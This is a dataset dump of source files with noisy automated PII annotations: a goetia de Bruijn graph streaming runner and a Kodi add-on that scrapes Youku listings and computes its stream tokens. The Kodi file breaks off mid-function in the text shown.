| 4,455 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2013'], ['PERSON', 'ldap'], ['PERSON', 'REMOTE_USER'], ['LOCATION', 'remote_user'], ['LOCATION', 'remote_user'], ['PERSON', 'remote_user'], ['PERSON', "dc=org'"], ['LOCATION', 'ldap'], ['URL', 'http://deb.li/DTAuthors'], ['URL', 'http://deb.li/DTLicense.'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.auth.ba'], ['URL', 'django.co'], ['URL', 'pts.accounts.mo'], ['URL', 'pts.co'], ['URL', 'pts.accounts.mo'], ['URL', 'debian.org'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'user.emails.al'], ['URL', 'request.user.is'], ['URL', 'self.is'], ['URL', 'request.us'], ['URL', 'request.ME'], ['URL', 'request.ME'], ['URL', 'request.user.is'], ['URL', 'request.user.emails.fi'], ['URL', 'auth.au'], ['URL', 'request.us'], ['URL', 'debian.org'], ['URL', 'self.ge'], ['URL', 'User.objects.cr'], ['URL', 'user.us'], ['URL', 'debian.org'], ['URL', 'ldap.in'], ['URL', 'db.debian.org'], ['URL', 'l.se'], ['URL', 'ldap.SC'], ['URL', 'self.ge'], ['URL', 'User.objects.ge'], ['URL', 'User.Do']] |
38 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# (c) Camille Scott, 2019
# File : cdbg_stream.py
# License: MIT
# Author : Camille Scott dummy@email.com
# Date : 11.03.2020
from goetia import libgoetia
from goetia.cdbg import (compute_connected_component_callback,
compute_unitig_fragmentation_callback,
write_cdbg_metrics_callback,
write_cdbg_callback)
from goetia.dbg import get_graph_args, process_graph_args
from goetia.parsing import get_fastx_args, iter_fastx_inputs
from goetia.processors import AsyncSequenceProcessor, at_modulo_interval
from goetia.messages import (Interval, SampleStarted, SampleFinished, Error, AllMessages)
from goetia.metadata import CUR_TIME
from goetia.serialization import cDBGSerialization
from goetia.cli.args import get_output_interval_args, print_interval_settings
from goetia.cli.runner import CommandRunner
import curio
import os
import sys
class cDBGRunner(CommandRunner):
def __init__(self, parser):
get_graph_args(parser)
get_cdbg_args(parser)
get_output_interval_args(parser)
group = get_fastx_args(parser)
group.add_argument('-o', dest='output_filename', default='/dev/stdout')
group.add_argument('-i', '--inputs', dest='inputs', nargs='+', required=True)
parser.add_argument('--echo', default=None,
help='echo all events to the given file.')
parser.add_argument('--curio-monitor', default=False, action='store_true',
help='Run curio kernel monitor for async debugging.')
parser.add_argument('--verbose', default=False, action='store_true')
super().__init__(parser)
def postprocess_args(self, args):
process_graph_args(args)
process_cdbg_args(args)
def setup(self, args):
os.makedirs(args.results_dir, exist_ok=True)
self.dbg_t = args.graph_t
self.hasher = args.hasher_t(args.ksize)
self.storage = args.storage.build(*args.storage_args)
self.dbg = args.graph_t.build(self.storage, self.hasher)
self.cdbg_t = libgoetia.cdbg.cDBG[type(self.dbg)]
self.compactor_t = libgoetia.cdbg.StreamingCompactor[type(self.dbg)]
self.compactor = self.compactor_t.Compactor.build(self.dbg)
if args.normalize:
self.file_processor = self.compactor_t.NormalizingCompactor[FastxReader].build(self.compactor,
args.normalize,
args.interval)
else:
self.file_processor = self.compactor_t.Processor.build(self.compactor,
args.interval)
# Iterator over samples (pairs or singles, depending on pairing-mode)
sample_iter = iter_fastx_inputs(args.inputs, args.pairing_mode, names=args.names)
# AsyncSequenceProcessor does event management and callback for the FileProcessors
self.processor = AsyncSequenceProcessor(self.file_processor, sample_iter, args.echo)
# Subscribe a listener to the FileProcessor producer
self.worker_listener = self.processor.add_listener('worker_q', 'cdbg.consumer')
#
# Register callbacks for data outputs.
# Track a list of files that need to be closed with a ]
# when we're done.
#
self.to_close = []
if args.track_cdbg_metrics:
self.worker_listener.on_message(Interval,
write_cdbg_metrics_callback,
self.compactor,
args.track_cdbg_metrics,
args.verbose)
self.to_close.append(args.track_cdbg_metrics)
if args.track_unitig_bp:
if args.unitig_bp_bins is None:
bins = [args.ksize, 100, 200, 500, 1000]
else:
bins = args.unitig_bp_bins
self.worker_listener.on_message(Interval,
at_modulo_interval(compute_unitig_fragmentation_callback,
modulus=args.unitig_bp_tick),
self.cdbg_t,
self.compactor.cdbg,
args.track_unitig_bp,
bins,
verbose=args.verbose)
self.to_close.append(args.track_unitig_bp)
if args.track_cdbg_components:
self.worker_listener.on_message(Interval,
at_modulo_interval(compute_connected_component_callback,
modulus=args.cdbg_components_tick),
self.cdbg_t,
self.compactor.cdbg,
args.track_cdbg_components,
args.component_sample_size,
verbose=args.verbose)
self.to_close.append(args.track_cdbg_components)
if args.save_cdbg:
for cdbg_format in args.save_cdbg_format:
self.worker_listener.on_message(Interval,
at_modulo_interval(write_cdbg_callback,
modulus=args.cdbg_tick),
args.save_cdbg,
cdbg_format,
verbose=args.verbose)
self.worker_listener.on_message(SampleFinished,
write_cdbg_callback,
args.save_cdbg,
cdbg_format,
verbose=args.verbose)
# Close all files when done
async def close_files(msg, files):
for file_name in files:
async with curio.aopen(file_name, 'a') as fp:
await fp.write('\n]\n')
self.worker_listener.on_message(SampleFinished, close_files, self.to_close)
#
# Regular diagnostics output
#
def info_output(msg):
info = f'{msg.msg_type}: {getattr(msg, "state", "")}'\
f'\n\tSample: {msg.sample_name}'\
f'\n\tSequences: {msg.sequence}'\
f'\n\tk-mers: {msg.t}'
if msg.msg_type == 'Error':
info += f'\n\tError: {msg.error}'
print(info, file=sys.stderr)
self.worker_listener.on_message(AllMessages, info_output)
def execute(self, args):
curio.run(self.processor.start, with_monitor=args.curio_monitor)
def teardown(self):
pass
def get_cdbg_args(parser):
default_prefix = 'goetia.build-cdbg.' + CUR_TIME
parser.default_prefix = default_prefix
group = parser.add_argument_group('cDBG')
group.add_argument('--results-dir',
default=default_prefix)
group.add_argument('--normalize',
type=int,
nargs='?',
const=10)
group.add_argument('--save-cdbg',
metavar='PREFIX.<format>',
nargs='?',
const='goetia.cdbg.graph',
help='Save a copy of the cDBG.')
group.add_argument('--save-cdbg-format',
nargs='+',
choices=cDBGSerialization.FORMATS,
default=['gfa1'])
group.add_argument('--cdbg-tick',
type=int,
default=10,
help='Save every N interval ticks.')
group.add_argument('--track-cdbg-metrics',
metavar='FILE_NAME.json',
nargs='?',
const='goetia.cdbg.stats.json',
help='Output basic cDBG metrics.')
group.add_argument('--cdbg-metrics-tick',
type=int,
default=5,
help='Output every N interval ticks.')
group.add_argument('--track-cdbg-components',
metavar='FILE_NAME.json',
nargs='?',
const='goetia.cdbg.components.json',
help='Save the distribution of component sizes.')
group.add_argument('--component-sample-size',
type=int,
default=10000,
help='Number of components to sample for size.')
group.add_argument('--cdbg-components-tick',
type=int,
default=5,
help='Sample and save distribution every N interval ticks.')
group.add_argument('--track-unitig-bp',
metavar='FILENAME.json',
nargs='?',
const='goetia.cdbg.unitigs.bp.json',
help='Track the distribution of unitig sizes.')
group.add_argument('--unitig-bp-bins',
nargs='+',
type=int,
help='Bin sizes of distribution.')
group.add_argument('--unitig-bp-tick',
type=int,
default=10)
group.add_argument('--validate',
metavar='FILENAME.csv',
nargs='?',
const='goetia.cdbg.validation.csv')
return group
def process_cdbg_args(args):
def join(p):
return p if p is None else os.path.join(args.results_dir, p)
args.track_cdbg_stats = join(args.track_cdbg_metrics)
args.track_cdbg_components = join(args.track_cdbg_components)
args.save_cdbg = join(args.save_cdbg)
args.track_cdbg_unitig_bp = join(args.track_unitig_bp)
def print_cdbg_args(args):
print('* cDBG Params', file=sys.stderr)
print('* Directory: ', args.results_dir, file=sys.stderr)
if args.save_cdbg:
print('* Saving cDBG every {0} sequences with file prefix {1}'.format(args.coarse_interval,
args.save_cdbg),
file=sys.stderr)
print('* cDBG save formats: {0}'.format(', '.join(args.save_cdbg_format)))
if args.track_cdbg_stats:
print('* Tracking cDBG stats and reporting every {0} sequences'.format(args.fine_interval),
file=sys.stderr)
print('* Saving tracking information to', args.track_cdbg_stats, file=sys.stderr)
if args.track_cdbg_history:
print('* Tracking cDBG history and saving to', args.track_cdbg_history, file=sys.stderr)
if args.validate:
print('* cDBG will be validated on completion and results saved to', args.validate,
file=sys.stderr)
print('*', '*' * 10, '*', sep='\n', file=sys.stderr)
| 11,564 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '11.03.2020'], ['PERSON', 'Camille Scott'], ['DATE_TIME', '2019'], ['PERSON', 'Camille Scott'], ['LOCATION', 'goetia.messages'], ['PERSON', 'get_fastx_args(parser'], ['PERSON', 'exist_ok=True'], ['LOCATION', 'sample_iter'], ['PERSON', 'self.to_close'], ['PERSON', 'with_monitor=args.curio_monitor'], ['PERSON', "const='goetia.cdbg.stats.json"], ['PERSON', "help='Output"], ['PERSON', "help='Output"], ['PERSON', "help='Bin"], ['PERSON', "const='goetia.cdbg.validation.csv"], ['LOCATION', 'join(args.track_unitig_bp'], ['URL', 'stream.py'], ['URL', 'email.com'], ['URL', 'goetia.cd'], ['URL', 'goetia.pa'], ['URL', 'goetia.pro'], ['URL', 'goetia.me'], ['URL', 'goetia.me'], ['URL', 'goetia.se'], ['URL', 'goetia.cli.ar'], ['URL', 'goetia.cli.ru'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'os.ma'], ['URL', 'args.re'], ['URL', 'args.gr'], ['URL', 'self.st'], ['URL', 'args.st'], ['URL', 'args.st'], ['URL', 'args.gr'], ['URL', 'self.st'], ['URL', 'self.cd'], ['URL', 'libgoetia.cdbg.cD'], ['URL', 'self.com'], ['URL', 'libgoetia.cdbg.St'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 't.Com'], ['URL', 'args.no'], ['URL', 'self.fi'], ['URL', 'self.com'], ['URL', 't.No'], ['URL', 'self.com'], ['URL', 'args.no'], ['URL', 'args.int'], ['URL', 'self.fi'], ['URL', 'self.com'], ['URL', 't.Pro'], ['URL', 'self.com'], ['URL', 'args.int'], ['URL', 'args.in'], ['URL', 'args.pa'], ['URL', 'args.na'], ['URL', 'self.pro'], ['URL', 'self.fi'], ['URL', 'args.ec'], ['URL', 'self.processor.ad'], ['URL', 'cdbg.co'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'self.com'], ['URL', 'args.tr'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'self.cd'], ['URL', 'self.compactor.cd'], ['URL', 'args.tr'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.cd'], ['URL', 'self.cd'], ['URL', 'self.compactor.cd'], ['URL', 'args.tr'], ['URL', 'args.com'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.sa'], ['URL', 'args.sa'], ['URL', 'args.cd'], ['URL', 'args.sa'], ['URL', 'args.ve'], ['URL', 'args.sa'], ['URL', 'args.ve'], ['URL', 'curio.ao'], ['URL', 'self.to'], ['URL', 'msg.ms'], ['URL', 'msg.sa'], ['URL', 'msg.se'], ['URL', 'msg.ms'], ['URL', 'msg.er'], ['URL', 'sys.st'], ['URL', 'curio.ru'], ['URL', 'self.processor.st'], ['URL', 'args.cu'], ['URL', 'parser.de'], ['URL', 'parser.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.gr'], ['URL', 'group.ad'], ['URL', 'cDBGSerialization.FO'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.st'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.com'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cd'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.va'], ['URL', 'os.path.jo'], ['URL', 'args.re'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.sa'], ['URL', 'args.sa'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.re'], ['URL', 'sys.st'], ['URL', 'args.sa'], ['URL', 'args.co'], ['URL', 'args.sa'], ['URL', 'sys.st'], ['URL', 'args.sa'], ['URL', 'args.tr'], ['URL', 'args.fi'], ['URL', 'sys.st'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.va'], ['URL', 'args.va'], ['URL', 'sys.st'], ['URL', 'sys.st']] |
39 | # -*- coding: utf-8 -*-
import xbmc, xbmcgui, xbmcplugin, xbmcaddon, urllib2, urllib, re, string, sys, os, gzip, StringIO, math, urlparse
import base64, time, cookielib
import simplejson
# Plugin constants
__addon__ = xbmcaddon.Addon()
__addonname__ = __addon__.getAddonInfo('name')
__profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode("utf-8")
UserAgent = 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'
ORDER_LIST1 = [['1','最多播放'], ['2','最多评论'], ['4','最受欢迎'], ['5','最近上映'], ['6','最近更新']]
DAYS_LIST1 = [['1','今日'], ['2','本周'], ['4','历史']]
ORDER_LIST2 = [['1','最多播放'], ['2','最新发布'], ['3','最多评论'], ['4','最多收藏'], ['5','最受欢迎']]
DAYS_LIST2 = [['1','今日'], ['2','本周'], ['3','本月'], ['4','历史']]
class youkuDecoder:
def __init__( self ):
return
def getFileIDMixString(self,seed):
mixed = []
source = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/\:._-1234567890")
seed = float(seed)
for i in range(len(source)):
seed = (seed * 211 + 30031 ) % 65536
index = math.floor(seed /65536 *len(source))
mixed.append(source[int(index)])
source.remove(source[int(index)])
return mixed
def getFileId(self,fileId,seed):
mixed = self.getFileIDMixString(seed)
ids = fileId.split('*')
realId = []
for i in range(0,len(ids)-1):
realId.append(mixed[int(ids[i])])
return ''.join(realId)
def trans_e(self, a, c):
b = range(256)
f = 0
result = ''
h = 0
while h < 256:
f = (f + b[h] + ord(a[h % len(a)])) % 256
b[h], b[f] = b[f], b[h]
h += 1
q = f = h = 0
while q < len(c):
h = (h + 1) % 256
f = (f + b[h]) % 256
b[h], b[f] = b[f], b[h]
result += chr(ord(c[q]) ^ b[(b[h] + b[f]) % 256])
q += 1
return result
def trans_f(self, a, c):
"""
:argument a: list
:param c:
:return:
"""
b = []
for f in range(len(a)):
i = ord(a[f][0]) - 97 if "a" <= a[f] <= "z" else int(a[f]) + 26
e = 0
while e < 36:
if c[e] == i:
i = e
break
e += 1
v = i - 26 if i > 25 else chr(i + 97)
b.append(str(v))
return ''.join(b)
f_code_1 = 'becaf9be'
f_code_2 = 'bf7e5f01'
def _calc_ep(self, sid, fileId, token):
ep = self.trans_e(self.f_code_2, '%s_%s_%s' % (sid, fileId, token))
return base64.b64encode(ep)
def _calc_ep2(self, vid, ep):
e_code = self.trans_e(self.f_code_1, base64.b64decode(ep))
sid, token = e_code.split('_')
new_ep = self.trans_e(self.f_code_2, '%s_%s_%s' % (sid, vid, token))
return base64.b64encode(new_ep), token, sid
def get_sid(self, ep):
e_code = self.trans_e(self.f_code_1, base64.b64decode(ep))
return e_code.split('_')
def generate_ep(self, no, fileid, sid, token):
ep = urllib.quote(self._calc_ep(sid, fileid, token).encode('latin1'),
safe="~()*!.'"
)
return ep
def log(txt):
message = '%s: %s' % (__addonname__, txt)
xbmc.log(msg=message, level=xbmc.LOGDEBUG)
def GetHttpData(url, referer=''):
log("%s::url - %s" % (sys._getframe().f_code.co_name, url))
req = urllib2.Request(url)
req.add_header('User-Agent', UserAgent)
if referer:
req.add_header('Referer', referer)
try:
response = urllib2.urlopen(req)
httpdata = response.read()
if response.headers.get('content-encoding', None) == 'gzip':
httpdata = gzip.GzipFile(fileobj=StringIO.StringIO(httpdata)).read()
charset = response.headers.getparam('charset')
response.close()
except:
log( "%s (%d) [%s]" % (
sys.exc_info()[2].tb_frame.f_code.co_name,
sys.exc_info()[2].tb_lineno,
sys.exc_info()[1]
))
return ''
match = re.compile('<meta http-equiv=["]?[Cc]ontent-[Tt]ype["]? content="text/html;[\s]?charset=(.+?)"').findall(httpdata)
if match:
charset = match[0]
else:
match = re.compile('<meta charset="(.+?)"').findall(httpdata)
if match:
charset = match[0]
if charset:
charset = charset.lower()
if (charset != 'utf-8') and (charset != 'utf8'):
httpdata = httpdata.decode(charset, 'ignore').encode('utf8', 'ignore')
return httpdata
def searchDict(dlist,idx):
for i in range(0,len(dlist)):
if dlist[i][0] == idx:
return dlist[i][1]
return ''
def getCurrent(text,list,id):
match = re.compile('<li class="current"\s*><span>(.+?)</span>').search(text)
if match:
list.append([id, match.group(1)])
def getList(listpage,id,genre,area,year):
if id == 'c_95':
str1 = '风格:'
str3a = '发行:'
str3b = 'r'
elif id == 'c_84' or id == 'c_87':
str1 = '类型:'
str3a = '出品:'
str3b = 'pr'
else:
str1 = '类型:'
str3a = '时间:'
str3b = 'r'
match = re.compile('<label>%s</label>(.+?)</ul>' % (str1), re.DOTALL).search(listpage)
genrelist = re.compile('_g_([^_\.]*)[^>]*>([^<]+)</a>').findall(match.group(1))
getCurrent(match.group(1), genrelist, genre)
if id == 'c_84' or id == 'c_87':
arealist = []
else:
match = re.compile('<label>地区:</label>(.+?)</ul>', re.DOTALL).search(listpage)
arealist = re.compile('_a_([^_\.]*)[^>]*>([^<]+)</a>').findall(match.group(1))
getCurrent(match.group(1), arealist, area)
match = re.compile('<label>%s</label>(.+?)</ul>' % (str3a), re.DOTALL).search(listpage)
yearlist = re.compile('_%s_([^_\.]*)[^>]*>([^<]+)</a>' % (str3b)).findall(match.group(1))
getCurrent(match.group(1), yearlist, year)
return genrelist,arealist,yearlist
def getList2(listpage,genre):
match = re.compile('<label>类型:</label>(.+?)</ul>', re.DOTALL).search(listpage)
if match:
genrelist = re.compile('<li><a href=".*?/category/video/[^g]*g_([0-9]+)[^\.]*\.html"[^>]*>(.+?)</a></li>').findall(match.group(1))
getCurrent(match.group(1), genrelist, genre)
else:
genrelist = []
return genrelist
def rootList():
link = GetHttpData('http://list.youku.com/')
match0 = re.compile('<label>分类:</label>(.+?)</ul>', re.DOTALL).search(link)
match = re.compile('<li><a\s*href="/category/([^/]+)/([^\.]+)\.html">(.+?)</a></li>', re.DOTALL).findall(match0.group(1))
totalItems = len(match)
for path, id, name in match:
if path == 'show':
u = sys.argv[0]+"?mode=1&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre=&area=&year=&order=1&days=1&page=1"
else:
u = sys.argv[0]+"?mode=11&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre=0&year=1&order=1&days=1&page=1"
li = xbmcgui.ListItem(name)
xbmcplugin.addDirectoryItem(int(sys.argv[1]),u,li,True,totalItems)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def progList(name,id,page,genre,area,year,order,days):
url = 'http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html' % (id, genre, area, order, days, year, page)
link = GetHttpData(url)
match = re.compile('<ul class="yk-pages">(.+?)</ul>', re.DOTALL).search(link)
plist = []
if match:
match1 = re.compile('<li.+?>([0-9]+)(</a>|</span>)</li>', re.DOTALL).findall(match.group(1))
if match1:
for num, temp in match1:
if (num not in plist) and (num != page):
plist.append(num)
totalpages = int(match1[len(match1)-1][0])
else:
totalpages = 1
match = re.compile('<div class="yk-filter" id="filter">(.+?)<div class="yk-filter-handle">', re.DOTALL).search(link)
if match:
listpage = match.group(1)
else:
listpage = ''
if id == 'c_95':
match = re.compile('<div class="yk-pack p-list"(.+?)</ul></div>', re.DOTALL).findall(link)
else:
match = re.compile('<div class="yk-pack pack-film">(.+?)</ul></div>', re.DOTALL).findall(link)
totalItems = len(match) + 1 + len(plist)
currpage = int(page)
genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)
if genre:
genrestr = searchDict(genrelist,genre)
else:
genrestr = '全部类型'
if area:
areastr = searchDict(arealist,area)
else:
areastr = '全部地区'
if year:
yearstr = searchDict(yearlist,year)
else:
if id == 'c_84' or id == 'c_87':
yearstr = '全部出品'
else:
yearstr = '全部年份'
li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + areastr + '[/COLOR]/[COLOR FFFFFF00]' + yearstr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST1,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST1,order) + '[/COLOR]】(按此选择)')
u = sys.argv[0]+"?mode=4&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre="+urllib.quote_plus(genre)+"&area="+urllib.quote_plus(area)+"&year="+urllib.quote_plus(year)+"&order="+order+"&days="+days+"&page="+urllib.quote_plus(listpage)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
for i in range(0,len(match)):
if id in ('c_96','c_95'):
mode = 2
isdir = False
else:
mode = 3
isdir = True
match1 = re.compile('/id_(.+?).html"').search(match[i])
p_id = match1.group(1)
match1 = re.compile('<img class="quic".*?src="(.+?)"').search(match[i])
p_thumb = match1.group(1)
match1 = re.compile('<li class="title"><a .*?">(.+?)</a>').search(match[i])
p_name = match1.group(1)
match1 = re.compile('<li class="status hover-hide"><span .*?<span>(.+?)</span>').search(match[i])
if match1:
p_name1 = p_name + '(' + match1.group(1) + ')'
else:
p_name1 = p_name
match1 = re.compile('<span class="vip-free">(.+?)</span>').search(match[i])
if match1:
p_name1 = p_name1 + '[' + match1.group(1) + ']'
li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb)
u = sys.argv[0]+"?mode="+str(mode)+"&name="+urllib.quote_plus(p_name)+"&id="+urllib.quote_plus(p_id)+"&thumb="+urllib.quote_plus(p_thumb)
#li.setInfo(type = "Video", infoLabels = {"Title":p_name, "Director":p_director, "Genre":p_genre, "Plot":p_plot, "Year":p_year, "Cast":p_cast, "Tagline":p_tagline})
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, isdir, totalItems)
for num in plist:
li = xbmcgui.ListItem("... 第" + num + "页")
u = sys.argv[0]+"?mode=1&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre="+urllib.quote_plus(genre)+"&area="+urllib.quote_plus(area)+"&year="+year+"&order="+order+"&days="+days+"&page="+str(num)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def getMovie(name,id,thumb):
if len(id)==21:
link = GetHttpData('http://www.youku.com/show_page/id_' + id + '.html')
match = re.compile('<a class="btnShow btnplayposi".*?href="http://v.youku.com/v_show/id_(.+?)\.html[^"]*"', re.DOTALL).search(link)
if not match:
match = re.compile('<div class="btnplay">.*?href="http://v.youku.com/v_show/id_(.+?)\.html[^"]*"', re.DOTALL).search(link)
if match:
# 播放正片
PlayVideo(name, match.group(1), thumb)
else:
# 解析预告片
match = re.compile('class="btnShow btnplaytrailer".*?href="http://v.youku.com/v_show/id_(.+?)\.html[^"]*"', re.DOTALL).search(link)
if match:
PlayVideo(name, match.group(1), thumb)
else:
xbmcgui.Dialog().ok(__addonname__, '解析地址异常,可能是收费节目,无法播放')
else:
PlayVideo(name, id, thumb)
def seriesList(name,id,thumb):
url = "http://v.youku.com/v_show/id_%s.html" % (id)
data = GetHttpData(url)
#pages = re.compile('<li data="(point_reload_[0-9]+)"', re.DOTALL).findall(data)
#if len(pages)>1:
# for i in range(1,len(pages)):
# url = "http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s" % (id, pages[i], pages[i])
# link = GetHttpData(url)
# data += link
match = re.compile('class="item(.+?)</div>', re.DOTALL).findall(data)
totalItems = len(match)
for i in range(0,len(match)):
match1 = re.compile('//v.youku.com/v_show/id_(.+?)\.html').search(match[i])
if match1:
p_id = match1.group(1)
else:
continue
#match1 = re.compile('<div class="thumb"><img .*?src="(.+?)"').search(match[i])
p_thumb = thumb
match1 = re.compile('title="(.+?)"').search(match[i])
p_name = "%s %s" % (name, match1.group(1))
p_name1 = p_name
li = xbmcgui.ListItem(p_name1, iconImage = '', thumbnailImage = p_thumb)
u = sys.argv[0]+"?mode=10&name="+urllib.quote_plus(p_name)+"&id="+urllib.quote_plus(p_id)+"&thumb="+urllib.quote_plus(p_thumb)
#li.setInfo(type = "Video", infoLabels = {"Title":p_name, "Director":p_director, "Genre":p_genre, "Plot":p_plot, "Year":p_year, "Cast":p_cast, "Tagline":p_tagline})
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems)
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def progList2(name,id,page,genre,order,days):
url = 'http://list.youku.com/category/video/%s_g_%s_s_%s_d_%s_p_%s.html' % (id, genre, order, days, page)
link = GetHttpData(url)
match = re.compile('<ul class="yk-pages">(.+?)</ul>', re.DOTALL).search(link)
plist = []
if match:
match1 = re.compile('<li.+?>([0-9]+)(</a>|</span>)</li>', re.DOTALL).findall(match.group(1))
if match1:
for num, temp in match1:
if (num not in plist) and (num != page):
plist.append(num)
totalpages = int(match1[len(match1)-1][0])
else:
totalpages = 1
match = re.compile('<div class="yk-filter\s*" id="filter">(.+?)<div class="yk-filter-handle">', re.DOTALL).search(link)
if match:
listpage = match.group(1)
else:
listpage = ''
match = re.compile('<div class="yk-pack p-list"(.+?)</ul></div>', re.DOTALL).findall(link)
totalItems = len(match) + 1 + len(plist)
currpage = int(page)
genrelist = getList2(listpage, genre)
if genre == '0':
genrestr = '全部类型'
else:
genrestr = searchDict(genrelist,genre)
li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST2,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST2,order) + '[/COLOR]】(按此选择)')
u = sys.argv[0]+"?mode=12&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre="+urllib.quote_plus(genre)+"&order="+order+"&days="+days+"&page="+urllib.quote_plus(listpage)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
for i in range(0,len(match)):
match1 = re.compile('/id_(.+?).html"').search(match[i])
p_id = match1.group(1)
match1 = re.compile('<img class="quic".*?src="(.+?)"').search(match[i])
p_thumb = match1.group(1)
match1 = re.compile('<li class="title"><a .*?">(.+?)</a>').search(match[i])
p_name = match1.group(1)
p_name1 = p_name
li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb)
u = sys.argv[0]+"?mode=10&name="+urllib.quote_plus(p_name)+"&id="+urllib.quote_plus(p_id)+"&thumb="+urllib.quote_plus(p_thumb)
#li.setInfo(type = "Video", infoLabels = {"Title":p_name, "Director":p_director, "Genre":p_genre, "Plot":p_plot, "Year":p_year, "Cast":p_cast, "Tagline":p_tagline})
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems)
for num in plist:
li = xbmcgui.ListItem("... 第" + num + "页")
u = sys.argv[0]+"?mode=11&name="+urllib.quote_plus(name)+"&id="+urllib.quote_plus(id)+"&genre="+urllib.quote_plus(genre)+"&order="+order+"&days="+days+"&page="+str(num)
xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
def selResolution(streamtypes):
ratelist = []
for i in range(0,len(streamtypes)):
if streamtypes[i] in ('flv', 'flvhd'): ratelist.append([4, '标清', i, 'flv']) # [清晰度设置值, 清晰度, streamtypes索引]
if streamtypes[i] in ('mp4', 'mp4hd'): ratelist.append([3, '高清', i, 'mp4'])
if streamtypes[i] in ('hd2', 'hd2v2', 'mp4hd2', 'mp4hd2v2'): ratelist.append([2, '超清', i, 'hd2'])
if streamtypes[i] in ('hd3', 'hd3v2', 'mp4hd3', 'mp4hd3v2'): ratelist.append([1, '1080P', i, 'hd3'])
ratelist.sort()
if len(ratelist) > 1:
resolution = int(__addon__.getSetting('resolution'))
if resolution == 0: # 每次询问视频清晰度
list = [x[1] for x in ratelist]
sel = xbmcgui.Dialog().select('清晰度(低网速请选择低清晰度)', list)
if sel == -1:
return None, None, None, None
else:
sel = 0
while sel < len(ratelist)-1 and resolution > ratelist[sel][0]: sel += 1
else:
sel = 0
return streamtypes[ratelist[sel][2]], ratelist[sel][1], ratelist[sel][2], ratelist[sel][3]
def youku_ups(id):
res = urllib2.urlopen('https://log.mmstat.com/eg.js')
cna = res.headers['etag'][1:-1]
query = urllib.urlencode(dict(
vid = id,
ccode = '0516',
client_ip = '127.0.0.1',
utid = cna,
client_ts = time.time() / 1000,
ckey = 'PI:KEY'
))
url = 'https://ups.youku.com/ups/get.json?%s' % (query)
link = GetHttpData(url, referer='http://v.youku.com/')
json_response = simplejson.loads(link)
api_data = json_response['data']
data_error = api_data.get('error')
if data_error:
api_error_code = data_error.get('code')
api_error_msg = data_error.get('note').encode('utf-8')
dialog = xbmcgui.Dialog()
